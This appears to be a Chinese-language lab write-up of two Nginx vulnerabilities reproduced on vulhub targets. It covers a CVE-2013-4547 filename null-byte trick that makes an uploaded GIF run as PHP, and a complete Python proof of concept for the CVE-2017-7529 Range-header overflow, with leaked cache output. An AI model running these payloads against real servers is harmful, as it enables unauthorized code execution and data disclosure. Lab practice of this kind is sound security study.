vulhub起靶场
Nginx 文件名逻辑漏洞(CVE-2013-4547)
上传1.gif,内容为
<?php phpinfo();?>
http://your-ip:8080/uploadfiles/1.gif[0x20][0x00].php访问文件位置,这里0x00要改包
先访问/uploadfiles/1.gif a.php(a是用来占位置的)然后在
这里把a的61改成00,然后放包
解析成功
Nginx越界读取缓存漏洞(CVE-2017-7529)
docker起环境直接拿poc打
import requests
import time
import urllib3
def cve20177529():
try:
# 构造请求头
headers = {
'User-Agent': "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36"
}
url = input('请输入目标URL:')
# 获取正常响应的返回长度
# verify=False防止ssl证书校验,allow_redirects=False,防止跳转导致误报的出现
r1 = requests.get(url, headers=headers, verify=False, allow_redirects=False)
url_len = len(r1.content)
# 将数据长度加长,大于返回的正常长度
addnum = 200
final_len = url_len + addnum
# 构造Range请求头,并加进headers中
# headers['Range'] = "bytes=-%d,-%d" % (final_len, 0x8000000000000000-final_len)
headers = {
'User-Agent': "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36",
'Range': "bytes=-%d,-%d" % (final_len, 0x8000000000000000 - final_len)
}
# 用构造的新的headers发送请求包,并输出结果
r2 = requests.get(url, headers=headers, verify=False, allow_redirects=False)
text = r2.text
code = r2.status_code
if ('ETag') in text and code == 206:
print('存在Nginx整数溢出漏洞(CVE-2017-7529),已输出到cve20177529_log.txt')
# 将结果输出到文本上
with open('cve20177529_log.txt', 'a', encoding="utf-8") as f:
f.write('存在Nginx整数溢出漏洞(CVE-2017-7529)-------------' + time.strftime('%Y-%m-%d %H:%M:%S',
time.localtime(
time.time())) + '-------------\n' + r2.text)
f.close
else:
print('未检测到漏洞')
# 将结果输出到文本上
with open('cve20177529_log.txt', 'a', encoding="utf-8") as f:
f.write('未检测到漏洞-------------' + time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(
time.time())) + '-------------\n' + r2.text)
f.close
except Exception as result:
print(result)
if __name__ == "__main__":
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
cve20177529()
存在Nginx整数溢出漏洞(CVE-2017-7529)-------------2025-04-08 19:26:35-------------
--00000000000000000002
Content-Type: text/html; charset=utf-8
Content-Range: bytes -200-611/612
, 08 Apr 2025 11:18:02 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 612
Last-Modified: Tue, 27 Jun 2017 13:40:50 GMT
Connection: close
ETag: "59526062-264"
Accept-Ranges: bytes
<!DOCTYPE html>
<html>
<head>
<title>Welcome to nginx!</title>
<style>
body {
width: 35em;
margin: 0 auto;
font-family: Tahoma, Verdana, Arial, sans-serif;
}
</style>
</head>
<body>
<h1>Welcome to nginx!</h1>
<p>If you see this page, the nginx web server is successfully installed and
working. Further configuration is required.</p>
<p>For online documentation and support please refer to
<a href="http://nginx.org/">nginx.org</a>.<br/>
Commercial support is available at
<a href="http://nginx.com/">nginx.com</a>.</p>
<p><em>Thank you for using nginx.</em></p>
</body>
</html>
--00000000000000000002
Content-Type: text/html; charset=utf-8
Content-Range: bytes -9223372036854774384-611/612
得到敏感信息